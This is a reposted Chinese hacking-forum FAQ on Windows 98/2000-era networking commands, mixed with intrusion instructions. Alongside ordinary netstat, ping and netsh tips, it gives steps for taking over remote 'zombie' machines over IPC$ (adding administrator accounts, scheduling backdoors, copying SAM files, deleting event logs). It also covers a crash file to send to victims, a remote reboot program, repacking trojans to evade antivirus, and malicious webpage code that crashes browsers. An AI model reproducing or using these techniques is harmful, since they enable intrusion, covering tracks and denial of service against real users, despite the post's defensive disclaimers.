[转帖]黑客技术经典问题FAQ

 

经典问题FAQ

转自:http://www.hackart.org/viewthread.php?tid=5621&extra=page%3D1 黑客技术网

出自：http://www.s8s8.net（网络技术论坛）黑白新区

1）如何查看本机所开端口：

   用netstat -an命令查看！再stat下面有一些英文，我来简单说一下这些英文具体都代表什么～

   LISTEN：侦听来自远方的TCP端口的连接请求

   SYN-SENT：再发送连接请求后等待匹配的连接请求

   SYN-RECEIVED：再收到和发送一个连接请求后等待对方对连接请求的确认

   ESTABLISHED：代表一个打开的连接

   FIN-WAIT-1：等待远程TCP连接中断请求，或先前的连接中断请求的确认

   FIN-WAIT-2：从远程TCP等待连接中断请求

   CLOSE-WAIT：等待从本地用户发来的连接中断请求

   CLOSING：等待远程TCP对连接中断的确认

   LAST-ACK：等待原来的发向远程TCP的连接中断请求的确认

   TIME-WAIT：等待足够的时间以确保远程TCP接收到连接中断请求的确认

   CLOSED：没有任何连接状态

×××××××××××××××××××××××××××××××××××××××××××××

   2）如何获得一个IP地址的主机名？

   利用ping -a ip 命令查看！再第一行的pinging后面的  『ip』前面的英文就是对方主机名！

   同样道理，利用ping machine_name也可以得到对方的ip

   获得一个网站的ip地址的方法是：ping www.xxx.com

   比如想知道sohu的ip，就用ping www.sohu.com来查看就可以了～

   顺便说一句：如果返回：Reply from *.*.*.*: TTL expired in transit的话，呵呵，代表TTL（生命周期）在传输过程中过期

   什么意思呢？我来解释一下！

   导致这个问题出现的原因有两个：1）TTL值太小！TTL值小于你和对方主机之间经过的路由器数目。 2）路由器数量太多，经过路由器的数量大于TTL值！

   呵呵，其实这两点是一个意思！只不过说法不同而已！

×××××××××××××××××××××××××××××××××××××××××××××

   3）如何查看本机的ip地址？

   用ipconfig来查看就可以！

   也可以再Windows中的开始菜单，运行中输入winipcfg，同样可以看到自己的ip

   ipconfig命令后面如果加一个参数 /all的话，可以得到更加详细的资料，比如DNS、网关等……

×××××××××××××××××××××××××××××××××××××××××××××

   4）再使用net命令的时候遇到一些错误代码，如何查看对应的错误信息？

   用命令 net helpmsg erorr_code来查看就可以了

   比如错误代码为：88

   则查看命令为：net helpmsg 88    下面有这个错误代码的中文显示！

×××××××××××××××××××××××××××××××××××××××××××××

   5）利用telnet连接到对方主机上，想获得一些系统信息，用什么命令？

   set命令可以很好的完成你所需要收集信息的任务的！

   方法：再cmd下直接输入set（telnet对方主机以后，也是直接set就可以了～然后能够得到NNNNN多的信息）

   再这里，computername：呵呵，还用说么？主机名！

   OS＝Windows_NT  ：操作系统的类型哦～

   path＝C:\perl\bin\  ：（perl的解释器位置！）

   systemDrive=c:    操作系统盘符！

   USERNAME=coldcrysky    当前登陆使用机器的用户

   ……

×××××××××××××××××××××××××××××××××××××××××××××

   6）跟踪路由器的命令是什么？

   tracert  格式：tracert ip

   中间会列出所有经过的路由器列表！这些路由器如果是暴露再防火墙外面的话，还可以看到路由的IP哦～呵呵（这里又涉及到了另外一个问题：为什么要把路由放在防火墙后面？原因呢，主要有两点：1）保护路由器！因为现在越来越多的攻击和入侵已经开始瞄准路由器了～如果直接把路由暴露在外面，呵呵，是非常危险的！被DoS了就不好了啊～呵呵，所以要放在防火墙里面；2）为路由器减少负担！如果所有的过滤功能统统都压在路由器上面，呵呵，路由器的负担就太大了！）

   当然，利用pathping也可以达到同样效果！格式与tracert一样！

×××××××××××××××××××××××××××××××××××××××××××××

   7）简单介绍一下cookie！

   cookie，又名小甜点。

   它的作用：记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……

   最常见的是，大家再登陆论坛（邮箱）的时候，经常在输入第一个字母的时候，往往下面就显示出了所有在本机登陆过该论坛（邮箱）的用户名吧？呵呵，这个就是cookie的作用！

   大家在Administrator的cookies目录中可以看到很多的记事本文档吧？这些都是cookie，虽然经过了加密，但是仔细查找的话，仍然能够看到一些敏感信息！况且现在也已经有了专门查看cookie的软件！利用这些软件，你的隐私将不保哦～

   那么，如何清除cookie呢？一般情况下，可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮，点击就可以清楚掉了～

   除此以外，还要在internet选项中的内容选项卡中找到自动完成按钮，把里面的四项都选中！然后点击清除表单，清除密码～

   然后到操作系统目录所在的分区中！进入Winnt（98为windows）目录（当然了，这些都是默认的目录！如果你安装的时候改名了，就对应的去相应目录）之后找到Temporary Internet Files目录（2000的目录在c:\Documents and settings\administrator\Local settings\Temporary Internet Files）98直接到windows目录下找Temporary Internet Files就可以了～，找到这个文件夹后，打开！看到里面有NNNNNNNNNNNN多的文件了么？呵呵，这些是你浏览过的网页的记录（有的时候从网站上面看到漂亮的FLASH，可是不能保存怎么办？只要在线浏览一遍以后，断线到这里来找*.swf，之后依次打开查看的话，相信你会找到你所需要的FLASH的！），好了，跑题了～继续说：这些文件是网站的页面记录，直接删除就可以了！

   另外，有没有彻底禁止cookie的方法呢？

   呵呵，当然有了！在IE的Internet选项中，找到隐私选项卡！，把里面的滑块拖到最上面，边上写着：阻止所有cookie，呵呵，是不是？

   另外一种方法：找到Windows目录下的cookies目录！把里面的txt文件全部删除！，最后应该只剩下一个index.dat文件！之后把这个文件夹设置成只读就可以了～

   不过，禁止cookie后，大部分的论坛都无法正常登陆了啊！呵呵，到底禁止不禁止就看你自己的了～

×××××××××××××××××××××××××××××××××××××××××××××

   8）安装2000的时候，速度会特别特别特别慢，怎么加快安装速度呢？

   在DOS上面安装，应该用98启动光盘来引导系统！然后按照下面的方法来做，可以提高安装速度：

   g:\>cd windows               -------假设G为光驱    windows为98的安装目录！
   g:\windows>smartdrv          -------加载smartdrv程序！加载后没有任何提示信息！只要不返回错误信息就是加载成功了～这时候安装2K的话，速度会很快的哦～

×××××××××××××××××××××××××××××××××××××××××××××

   9）Windows2K密码忘记了，如何才能进入系统？

   Windows2K的用户配置信息和密码保存在SAM文件里！该文件位于：c:\winnt\system32\config目录中！只要删除这个文件就可以了～

   另外，在c:\winnt\repair目录中也同样有一个SAM文件（这个是前者的备份！）如果你在登陆肉鸡的时候，copy前面那个目录中的SAM文件，你会发现COPY不下来！呵呵，为什么？因为运行着的2K系统会保护SAM文件啊～这个时候你就COPY这个就可以了！

×××××××××××××××××××××××××××××××××××××××××××××

   10)ping不到，tracert不到，但是却能用nbtstat显示对方的一些信息，为什么？

   因为tracert和ping命令使用的是ICMP协议！而nbtstat是通过对方的netbios端口来获得对方的主机信息的！使用的是UDP和TCP协议！如果对方仅仅只对ICMP协议做了禁止的话，那通过这个命令获得系统信息是正常的！

×××××××××××××××××××××××××××××××××××××××××××××

   11）telnet上去后，如何给对方开共享？

   开共享的命令如下：net share c=c:\winnt\system    返回共享成功

   之后直接利用\\ip\c来访问对方的system目录了～删除共享用

   share c /del  命令就可以了

×××××××××××××××××××××××××××××××××××××××××××××

   12）如何判断对方的具体操作系统版本？

   首先用ver命令查看对方的版本号！

   如果是5.00.2195的话，为2K；5.1.2600为XP

   从这里可以区分出来到底是2K还是XP了～下面进行更加具体的区分！

   2K的pro和svr版本区分：

   在telnet下，net shart查看启动的服务～如果对方开启了Terminal Services服务的话，基本上可以判断为svr以上的版本了～如果没有开启，则为pro！（具体方法有三种，因为前几天在论坛中我回复过暗界了～所以这里就不再重复了～）

   XP的pro和home版的区分：

   home edition是无法安装iis的！所以，可以通过iis服务来判断到底是home版或者是pro了～

   当然了，如果对方是pro，但是将iis删除（停用）的话，就没办法判断了～呵呵

×××××××××××××××××××××××××××××××××××××××××××××

   13）如何查看98的随机启动的程序？

   在98下有一个实用配置程序（msconfig），中文名为：系统配置实用程序，调用的方法是在：开始——运行中输入msconfig，在里面，有一个启动的选项卡，点击后，可以看到很多随即启动程序，如果前面带有钩的话，就是启动时随机启动的，取消的话就是把前面的小钩去掉就可以了～（如果在这里查看到了一些未知的启动文件——比如没有文件的具体路径，或者没有文件名的话，最好取消它的自启动！因为很有可能是木马！）

   除了这里以外，还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡，他们分别对应这几个文件！只不过在这里更方便查看而已！


×××××××××××××××××××××××××××××××××××××××××××××

   14）设置了BIOS密码，可是却忘记了，该怎么办？

   如果是可以进入Windows的话，可以找找biospwds和cmospwd这两个软件看看～

   还有利用DEBUG法：

   简单介绍两种：

   1）-o 70 16
      -o 71 13
      -q

   2）-o 70 16
      -o 71 16
      -q

   另一种方法：copy法：

   copy con cmos.com

   输入下面10个字符：alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格，然后按下F6并回车，退出，运行这个cmos.com程序就可以了～

   恩，如果不能进入Windows怎么办呢？

   简单介绍两种方法：

   1）用通用密码：

   Award Bios密码：j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589

   AMI bios密码：AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.

   这是常见的密码，不妨试试～

   如果不行的话，可以利用CMOS放电：

   就是把主板上的电池取下来，等一会儿再插上去～

×××××××××××××××××××××××××××××××××××××××××××××

   15）如何自制一个让98蓝屏的炸弹？

   恩，这个是前几天QQ上面朋友问我的问题，整理的时候突然间想起来了，就写一下好了～

   首先，打开Word，再插入菜单中选择对象，这时，弹出对象包装程序窗口，再这个窗口中，点击导入，随便找一个文本或者程序就可以！之后点：编辑菜单。这里选择命令行，出现一个命令行窗口，在里面协商c:\con\con，点击保存，完成后，再点编辑包中的复制包，把他随便到一个地方复制下来，之后看到的是一个名位片断的东西！给这个文件起一个名字，呵呵，传给那个可怜的家伙吧，等待他蓝屏，掉线！

   （这个命令行中可以插入很多的命令，不见得非要用这个98蓝屏漏洞哦～）顺便说一下：这个已经不是什么新鲜的技术了，这个技术的名字叫做：碎片对象。呵呵，碎片？记忆碎片么？不是的！他的后缀是：.shs！之所以说一下这个，是因为有的朋友还不知道～做一个整理而已！不知道的朋友看过后就知道了，知道的朋友就权当复习了～另外，不要利用这个方法做破坏！否则后果自负！

×××××××××××××××××××××××××××××××××××××××××××××

   16）如何再命令行下杀死对方进程？

   利用微软的2K以上操作系统都是含有这个工具的！该工具包含在2K光盘的\support\tools文件夹下！里面有安装程序，点击后，就安装了2K的support tools工具包，里面有kill这个工具，这时候再cmd下可以输入kill/?，就可以看到帮助了，使用这个命令的格式是：kill pid  （pid是进程的ID号！）再任务管理器中可以看到进程的ID号！（不知道有几位朋友用过蓝色火焰？呵呵，用法跟这个一摸一样！还有很多类似的木马、后门软件都有类似的功能！这个是windows自带的大木马『后门工具』而已！）

   这时候，有朋友问了，那再命令行下如何查看进程呢？呵呵，这就用到了系统自带的有一个后门工具了：再刚才说得那个目录中，还有一个工具叫tlist  看名字就能看出来是干什么的吧？用法更简单！直接输入tlist就可以得到pid遇队形程序的列表了～

   那对方机器如果没有安装这两个程序怎么办呢？没关系，你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了！呵呵～

×××××××××××××××××××××××××××××××××××××××××××××

   17）上次说了ping的基本用法，这次谈谈ping的命令参数！

   这个是本次问题集的重点部分！无论是小鸟还是老鸟，你们能保证你真的对这些参数了如指掌么？恐怕都未必！还是好好看看吧！

   这是TCP／IP协议中最有用的命令之一

   它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。

   Usage： ping ［-t］ ［-a］ ［-n count］ ［-l size］ ［-f］ ［-i TTL］ ［-v TOS］
                ［-r count］ ［-s count］ ［［-j host-list］ ［-k host-list］］
                ［-w timeout］ destination-list

   Options：

   -t Ping the specifed host until interrupted.（除非人为中止，否则一直ping下去）

   -a Resolve addresses to hostnames.（把IP转为主机名）

   -n count Number of echo requests to send.（响应请求的数量）

   -l size Send buffer size.（封包的大小）

   -f Set Don't Fragment flag in packet.（信息包中无碎片）

   -i TTL Time To Live.（时间）

   -v TOS Type Of Service.（服务类型）

   -r count Record route for count hops.

   -s count Timestamp for count hops.

   -j host-list Loose source route along host-list.

   -k host-list Strict source route along host-list.（较严格的……唉，怎么译好……算了，放着吧）

   -w timeout Timeout in milliseconds to wait for each reply.（timeout的时间）

   比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。

   其实这个命令主要是用来看对方应答的速度，如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。

×××××××××××××××××××××××××××××××××××××××××××××

   18）如何查看本机的DNS服务器？

   ipconfig其实是可以的（呵呵，上次就介绍过这个命令），除此以外，还可以利用一个命令：再cmd下输入netsh，进入到netsh>提示符，再输入：int ip 进入到interface ip> 然后再次输入dump，这时候屏幕上出现当前连接的配置情况了

   这里必须介绍一下netsh到底是作什么用的！这个命令比较复杂，他包含了很多的子命令，所以这里只对部分命令进行讲解：

   1）查看本机IP：首先键入netsh，再netsh>提示符下输入：interface 回车 之后：ip 回车 再之后：show address 回车 这样，就可以看到当前连接的IP地址和子网掩码。（其实这个命令不如ipconfig简单，也不如ipconfig/all全面）

   2）修改网络配置：接着上面的命令，我们使用：set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0，这样就修改了当前的IP地址，用show address来看看（或者用ipconfig）

   3）显示一个完整的网络配置教本：

   刚才说过，第一个命令显示的信息不如ipconfig/all全面，不用着急，netsh再打印显示网络配置上，还是有自己的特色的！例如：再interface ip>状态下输入：dump，会显示一个清单，显示所有本地连接（不管你是否使用～）与netstat -an不完全一样！

   这就是netsh的简单介绍和最基础的用法！希望大家能够掌握！还可以输入？来查看帮助！（要在netsh>提示符下才能查看帮助啊～）

×××××××××××××××××××××××××××××××××××××××××××××

   19）肉鸡上的部分文件无法删除，怎么办？

   如果对方的文件夹是只读的话，会出现拒绝访问的字样！这时候，我们可以再del命令后面加上/f参数来删除！

×××××××××××××××××××××××××××××××××××××××××××××

   20）再说一个可以限制用户登陆时间的命令！

   再net命令中就可以实现这样的功能！具体方法如下：

   假如我们打算让：coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆，用这个命令：

   net user coldcrysky /times:sunday-monday,08:00-16:00

   之后利用net user coldcrysky命令来查看登陆时间的限制，可以看到是我们所规定的时间（因为是中文的，很容易懂，我就不多废话了）

   在此，特别提醒各位：命令中：星期日才是一周的开始！！！不要当成星期一！

   光说了怎么设置，如果想恢复回去怎么办呢？（就是恢复成默认状态，任何时间都可以登陆的状态）

   看我的：net user coldcrysky /time:all    ——这样就可以了～
21）说道这里，我突然想起了一个关于脱壳和加壳的问题！

   最近论坛中问这种问题的朋友又多了起来！曾经我回复过一个朋友，后来那个帖子也找不到了～

   这里我在说一下！

   其实脱壳和加壳并不是很困难！

   先说说壳的作用吧！其实加壳的作用一共有2个目的！

   1）可以压缩EXE格式的文件！使体积变小！

   2）保护软件吧重要信息保护起来，防止别人更改！

   脱壳和加壳分2种方法！

   第一种方法：手动脱壳（加壳），呵呵，这个是比较麻烦的！恩，需要了解源代码什么的，还要知道不同的脱壳（加壳）软件的算法，才能成功脱壳（加壳），新学习脱壳（加壳）技术的朋友不推荐使用！

   第二种方法是：自动脱壳（加壳）！通过使用软件，可以轻而易举的实现上面那个相对来说复杂一些的操作！对了，补充一下啊～！其实脱壳和加壳现在还有一个引申的作用！就是让杀毒软件不能识别出病毒！！！呵呵……这个一会儿再说！

   主要使用的软件有：FileInfo、Language2000、TYP、PEiDentifier等（侦测软件！可以查看该文件用什么加壳软件加的壳！！！为脱壳起到至关重要的辅助作用！！！）

   脱壳软件：AspackDie、UnAspack、UnPEPack等……（UPX也可以自己脱掉自己加的壳！）

   加壳软件：UPX、ASPack……这两个特别流行！

   恩，有的木马如果你用最新的杀毒软件查看，并不能查出是木马程序，但是如果你在开启病毒防火墙的情况下运行这个程序，则防火墙报警，说有木马或病毒什么的，询问如何处理，一般这种情况，就证明这个文件是通过脱壳、加壳后处理的木马了！小心啊，不要运行！！！其实不知道是谁说的脱壳、加壳处理木马？其实他再说的过程中似乎还省略了一些东西！再这个过程中，可以把木马做的更加个性化！更隐蔽，让杀毒软件更加无能为力！方法是：再脱壳后，用汇编软件（UltraEdit）打开那个木马！修改里面的标志性文字或者符号！再用eXeScope给木马换一个图标，之后再次加壳，这样，由于木马中的特征字符被更改了，导致以前能识别的木马现在杀毒软件更加不能识别出来了～比如：著名的冰河，在其服务端的源代码中有一段歌词，把歌词替换掉，呵呵……如果有的杀毒软件查找冰河的源代码时候仅仅检测的是这段歌词，以歌词作为冰河的特征的话，那这个杀毒软件可就……另外，前面说了，加壳的作用还有一个就是保护版权信息！可以把木马的版权信息（如制作人更改成你的名字，那么……呵呵）比较个性化吧～～～恩，当然，我写这个回帖的目的不是让大家都去练习脱壳、加壳，做木马，黑中国人！我的目的是让大家了解那些所谓能不被杀毒软件查杀的木马是怎么制作出来的，让大家更好的防范！

   后面的是我后来补充的帖子内容：因为部分朋友看完我前面的回复后，仍然不明白～所以补充说明～

   恩，检查壳的软件？？？我用Language2000＋PEiDentifier来看！前者可以看这个软件用什么编写的，比如C＋＋什么的，但是对于到底是什么加壳软件加壳，探测的效果不好……后者可以看这个软件用什么加的壳～本帖给加上了后者的软件！（大家如果需要，自己去找找看，实在找不到，可以跟我联系！）恩，下面我在重复一遍我上一个帖子的东东啊！！！大家如果不仔细看上一个帖子，怎么能理解加壳的作用呢？？？

   加壳的目的是让杀毒软件不能够识别加壳后的木马！！！这一点是不允许任何人有疑问的！！！恩～怎么说呢？如果大家都用UPX加壳（这里是假设），前面介绍过了，如果都用软件的话，由于这个是自动加壳的软件，所以加壳的效果没有任何好坏之分！！！一个不会用电脑的人或许加壳的水平和一个加壳高手（晕~有这种高手么？）的加壳水平一样！当然，前提是都用同一个软件加壳的话！不过真正的加壳高手是不会用加壳软件的！他们选择手动加壳！如果是手动加壳，那由于加壳的人的水平不一，导致壳的质量也不同！！！自动加壳不存在水平的问题！！！首先推荐使用UPX，简单到我都想自杀了～～～其次是ASPack，可以设定加壳后的文件保护！还可以设定使用限制（比如天数限制，次数限制……）

   下面这个问题也是老生常谈了，前面的帖子说过的！木马脱壳后，经过编辑木马！可以吧木马编辑的更加个性！比如木马的制作人等资料……包括木马的图标！！！都做好以后，再次加壳，可以达到3个目的！！！1）保护木马，不被杀毒软件查杀！！！这点是相当实用的！2）保护木马不被别人更改！如果用UltraEdit等软件打开加壳后的木马，木马中的中文是乱码！！！用这个方法可以判断程序是否加壳！加壳的程序打开后中文显示的是乱码，未加壳的则是中文！！！3）也是最最最最最最最最重要的一点！前面说了一遍了，加壳后可以使EXE文件的尺寸大大减小！！！相信你不会吧一个1M多的木马传给别人或者捆绑到网页，捆绑到Flash，捆绑到程序里吧，那样做是十分不明智的！！！！！！！！！！！！！

   关于加壳的问题就说这么多～似乎废话多了点！再次请求大家仔细看看我前面的帖子和这个帖子，如果看完后还有不明白的再提问！很多问题都重复了……

   Steven-1985，你的问题我前面也说过：木马加壳的确可以躲避杀毒软件，从而不被查杀，不过，有一点需要注意！运行木马后，木马释放出来的程序、Dll文件是脱壳后的文件！（相当于解压缩后的文件），这些文件已经不受壳的保护了！！！用最新版的杀毒软件可以查杀掉的！

   如果还有不明白的问题的话，还可以参考看一下：黑白专区的steven-1985的加壳与脱壳的帖子！

×××××××××××××××××××××××××××××××××××××××××××××

   22)如何删除windows2K的默认贡献？

   首先打开记事本，输入如下内容：

   net share c$ /delete
   net share d$ /delete
   net share e$ /delete
   net share f$ /delete
   net share g$ /delete
   net share ipc$ /delete
   net share admin$ /delete

   这里的c$、d$、e$……是代表默认共享的盘符～又几个就设置几个就可以了～

   之后点击保存成批处理文件（后缀为：bat的文件！）！加入到启动组中就可以了～

×××××××××××××××××××××××××××××××××××××××××××××

   23）139端口的又一用法

   呵呵，写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点：1）不要利用本帖所提到的方法去搞恶意破坏！2）呵呵，可能许多人已经知道了139端口这个用法了～本文只想起到一个抛砖引玉的作用！

   废话不多说了～开始：

   如果你使用NT主机的话，那你可要注意了！
   重启NT主机的方法如下：

   1：Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
      建立一个IPC连接

   2：net use H: \\XXX.XXX.XXX.XXX\C$
      将对方的C盘映射为自己的h盘

   3：copy c on h:\reboot.bat
      Iisreset /reboot
      CTRL+Z
      在对方的C盘上生成一个能重启机器的文件

   4：net time \\XXX.XXX.XXX.XXX
      得到对方机器时间

   5：at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
      设定对方重启的时间！

   6：at \\XXX.XXX.XXX.XXX
      查看任务上面是否添加了这个任务

   7：等对方重启好了～

   上面的第三步是only for Win2K的，如果是Nt，就需要用意个指定的重启程序，我们可以自己编写一个reboot.exe来代替reboot.bat，代码如下：
   #include "stdio.h"
   #include "windows.h"
   int main()
   {
   //定义重启的时候发送给所有用户的消息
   LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
   //尝试用最简单的API函数重启
   if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
   if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
   //因为上面的重启不成功，所以需要调整本进程的特权
   HANDLE hToken;
   TOKEN_PRIVILEGES tkp;
   if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
   //获取重启的特权  SE_SHUTDOWN_NAME
   LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
   tkp.PrivilegeCount=1;
   tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
   AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
   //判断是NT内核还是9X内核，选择用不同的方式
   if(!GetVersion()& 0x80000000))
   InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
   else if (!ExitWindowXXX(EWX_REBOOT,0))
   if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
   return FALSE;
   return TRUE;

   对了，再次说明啊，别用本文提到的方法搞破坏，小心警察叔叔打PP～呵呵

×××××××××××××××××××××××××××××××××××××××××××××

   24）利用批处理文件来建立一个记录3389登陆者信息的记录器

   由于Terminal Service默认是没有日志记录的，只能依靠他的系统日志，但是系统日志只能记录一些大动作（开启或停止服务），那么，如何用批处理文件来编写一个将是3389端口的程序呢？很简单：

   建立一个批处理文件：内容如下：

   @echo off
   date/t >> c:\3389log.txt
   :TS3389
   time/t >> c:\3389log.txt
   netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
   goto :TS3389

   之后保存！

   如果有人用你的3389登陆你的机器，呵呵，在c盘下就有3389log.txt这个文件！记录了当天日志，还有连接时间……资料～开始反击～呵呵

×××××××××××××××××××××××××××××××××××××××××××××

   25）网络命令小节（最近因为新学HACK的朋友人数上涨了～所以把我的这个陈年老调又一次拿出来，因为是我刚来S8S8的时候就整理的了，所以可能会有些错误的地方，如果发现请帮忙指出！）——呵呵，第一个问题只对菜鸟有作用！如果你是高手或者是自认为高手的话，请从第二题看起！

   A、NET命令：

   IPC连接：格式 net use \\对方IP\ipc$ "密码" user:"用户名"           『建立IPC连接～』
                 net use \\对方IP\ipc$ /delete      『断开连接～』

   以下操作需要在连接到对方主机后才可进行！！！

   net user coldcrysky xyz /add       『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』

   net localgroup Administrator coldcrysky /add        『把名为coldcrysky的用户加入ADMIN组—以为着权限的提高啊！！！^_^』

   net use z:\\对方IP\C$              『把对方的C盘映射为本机的Z盘—可依照需要更改映射盘符！』
   net start telnet                   『开启TELNET』
   net user guest /active:yes         『激活GUEST』
   net user guest coldcrysky          『把GUEST密码改为COLDCRYSKY』

   B、AT命令：

   查看远程机时间：net time \\对方IP

   加入一项新任务：

   at \\对方IP 时间  文件名         『用来把自己上传的后门程序在制定时间运行，方便以后进入肉鸡！』

   C、TELNET命令：

   telnet 对方IP 端口             『作用不用我说了吧？？？』

   D、FTP命令：

   登陆：ftp 对方网址（IP地址）
   上传文件：get 文件在本机完整路径 对方文件存放完整路径
   下载文件：put 对方文件完整路径 本机存放文件路径

   E、COPY命令：

   在建立连接后（尤其是IPC$连接后，很有用的命令哦～）
   ⑴copy index.htm \\127.0.0.1\c$\index.htm
    『将本机index.htm文件复制到127.0.0.1的C盘下，如果要放到对方的NT目录下，则把C改为admin$』
   ⑵copy \\127.0.0.1\admin\repair\sam_ c:\
    『将远程机数据库文件拷贝到本机C盘根目录下』

   F、SET命令：

   主要用于分析目标计算机的基本信息用！具体使用方法请查找相关文件！

   G、NBTSTAT命令：

   nbtstat -A 对方IP （这个A大写）

   『在其中显示<037>前面的英文或数字就是计算机名称！当然，也可以利用PING -A 对方ip的方法来查看对方主机名！效果相同！！！』

   H、SHUTDOWN命令：

   『用来关闭对方NT服务的命令』格式如下：
   shutdown \\IP地址 t:20
   『20秒后自动关闭对方NT服务！由于对对方机器影响较大，慎用！！！』

   I、DIR命令：

   还用我说么？大家是不是早就该掌握了？？？（不知道的还是查阅相关资料吧～～～）

   J、ECHO命令：

   echo coldcrysky >index.htm      『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
   echo coldcrysky >>index.htm     『把coldcrysky加入到index.htm中』

   K、ATTRIB命令：

   更改文件属性用，格式：
   Attrib -r index.htm      『去掉只读属性』（＋- 分别代表增加和减少）

   L、DEL命令：

   『删除日志的时候用！』
    del c:\winnt\system32\logfiles\*.*
    del c:\winnt\system32\config\*.evt
    del c:\winnt\system32\dtclog\*.*
    del c:\winnt\system32\*.log
    del c:\winnt\system32\*.txt
    del c:\winnt\*.txt
    del c:\winnt\*.log

   M、PING命令：

   -t ：ping制定IP，知道网络断开或按CTRL+C结束！
   -a ：解释PING IP的主机名
   -n count ：发送count指定的ECHO数据包，默认为4个！
   26）这里我必须（或者说不得不重新重申一个命令！不过说之前我要把这个命令的相关命令稍微介绍一下！）

   我要说的命令就是：开启服务和停止服务的net start     and    net stop

   这两个命令大多数朋友已经很熟悉了吧？不过为了方便更多的菜鸟能看明白我要说的意思，不用再看其他相关文章，所以我简单说两句：net start是开启服务！那么，如何开启呢？比如，我们这里要开启telnet服务，那就直接再2K的cmd下输入：net start telnet就OK了～关闭一项服务的话，把start换成stop就OK了～不过这里必须要注意：你所关闭的服务必须是已经开启的服务！！！好像是一句废话

   OK，有了这个前提后，下面就继续介绍：那么，net start和net stop到底能开启什么服务？其实这点也不需要你强记，记住这个命令就可以了：net help start和net help stop，这两个会显示出你所能开启的服务有那些~~

   这里比如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”，那么当这个命令使用net start和net stop的时候，你必须在这项服务上面加上“”，原因是因为这个服务名称中带有空格！如果服务名称中不带空格，你可以不用带这个引号！！！这点是我强调的问题！大家一定不要忘记了！『前些天看到S8S8.net的黑白新区中有人说net start 和 net stop后面的服务名必须带空格是错误的！明白原因了吧？』

×××××××××××××××××××××××××××××××××××××××××××××

   27）关于双系统的两个问题：

   A、如何在双系统（98、2000）中安全删除2K？

   先制作一张Windows 98 的启动软盘，再用它启动你的计算机，运行sys命令恢复Windows 98引导记录后，再运行fdisk/mbr恢复主引导记录，完成后进入Windows 98，把winnt 和system volumn information 目录删除，再删掉C盘上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。

   B、 Windows 98/XP双系统启动菜单修复

   1.修复前，在BIOS中设置从光驱启动。用Windows XP安装盘启动电脑，在加载必要的驱动后，出现Windows XP的安装界面。有三个选项：

（1）要现在开始安装Windows XP，请按“Enter”键。

（2）要用“恢复控制台”修复Windows XP安装，按“R”键。

（3）要退出安装程序，不安装Windows XP，按“F3”键；

   2. 按“R”键，进入“Microsoft Windows XP (TM) 故障恢复控制台”界面；故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已安装的Windows XP系统文件，然后显示搜寻结果，并询问“要登录到哪个Windows XP安装（要取消，请按Enter）”，选择1. D:\Windows，回车，系统会再询问“管理员密码”，再键入安装Windows XP时设置的管理员密码，回车，出现D:\Windows〉，这时需要输入修复命令Fixboot，后面的参数为启动扇区要写入的磁盘盘符，这里填入C:，回车。修复完成，键入Exit退出。重启后就会看到久违的双重启动菜单了。并且，这样修复后基本不产生垃圾文件。

   因为这两个问题是非常非常普遍的，所以我就收集到这里了～


×××××××××××××××××××××××××××××××××××××××××××××

   28）这里说几个主页恶意代码：『并不是让大家把这些代码加入到自己的主页中！只是希望大家能了解恶意代码，起到更好的防护作用！』

A、死循环代码：
『把下列代码加入到网页中，可达到如上效果』
<img src=javascript:location=“网页的文件名.htm:”>

说明：当含有这段代码的网页被人点击，连接就会不断的打开IE浏览器，直到你的系统资源浪费到0％～只有重新启动才能正常使用！

预防方法：禁用所有的ActiveX控件和插件！因为这是一个ActiveX教本程序～

B、恐怖的大图片：
『把下列代码加入到网页中，可达到如上效果』
<img src= "http://恐怖图片的连接地址" width= "1" height= "100000000000000000000000">

说明：当打开这样的网页，IE会不断的解释试图打开，但由于图片实在太大，超出了其处理能力，所以……

C、地震死机代码：
『把下列代码加入到网页中，可达到如上效果』
<script>
if (window.top.moveBy){
for (i = 1;i < 50; i++){
for (j = 3;j > 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
</script>
<img src="c:\con\con">

说明：<img src="c:\con\con">是windows9x的设备名称解析漏洞！
